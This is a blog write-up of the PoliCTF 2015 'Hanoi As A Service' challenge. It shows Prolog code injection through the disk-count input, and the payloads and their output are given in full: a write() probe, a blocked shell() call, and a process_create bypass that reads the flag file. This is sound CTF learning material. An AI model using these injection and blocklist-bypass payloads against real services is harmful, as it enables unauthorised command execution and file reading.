2015, CTF, PoliCTF

English [PoliCTF 2015] [Pwn50 – Hanoi As A Service] Write Up

Leave a comment

Description

HANOI AS A SERVICE

50 Points – SOLVED

Check out our shiny new HaaS platform!

nc haas.polictf.it 80

This one was pretty easy. When you connect to has.polictf.it, the server send you this :

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?

When you enter a number, it show you the Hanoi solution :

2
* Move top disk from a to c
* Move top disk from a to b
* Move top disk from c to b

But programmers didn’t verify the variable we sent. So, basically, we could write anything, some letters for example :

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
A
ERROR: Prolog initialisation failed:
ERROR: </2: Arguments are not sufficiently instantiated

The first thing to see is that we’ve got some prolog errors (oh no, prolog, f***)
And the second thing is that we know how to crash the program by typing some letters. But could we do more? Let’s try that :

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1)
ERROR: Prolog initialisation failed:
ERROR: Syntax error: Illegal start of term
ERROR: hanoi(1)
ERROR: ** here **
ERROR: ) .

I just entered “1)” and a quite explicit error have been raised. We could basically think that the code looks like that :

1
hanoi($var).

And moreover, we could guess that there is no protection on the $var ; as we entered “1)”, the code failed because there was too many parenthesis. We clearly see that we can inject some code here 😉 Just in order to be sure, let’s try with “1),write(‘aaaa’ ” ( the “,” is the line delimiter)

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),write(‘aaaa’
* Move top disk from a to b
aaaa

This is obvious, we wrote aaaa. Our goal is to get a flag, certainly in a file on the server. We just have to launch shell commands, don’t we?

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),shell(‘ls’, 1)
Nice try…

Annnnnnnd Failed! we can’t use the shell function because they blocked it :/ No worries, I’ve got other ideas : process_create, for example! After some bit of work (in order to find the flag file with ls), we have the file name (jhknsjdfhef_flag_here) so we just display it :

nc haas.polictf.it 80
Welcome to the Hanoi-as-a-Service cloud platform!
How many disks does your tower have?
1),process_create(path(tail), [‘/home/ctf/haas/jhknsjdfhef_flag_here’], []
* Move top disk from a to b
flag{Pr0gramm1ng_in_l0g1c_1s_c00l}

Here is the flag : flag{Pr0gramm1ng_in_l0g1c_1s_c00l} 🙂

Enjoy

The lsd

Leave a Reply

Your email address will not be published. Required fields are marked *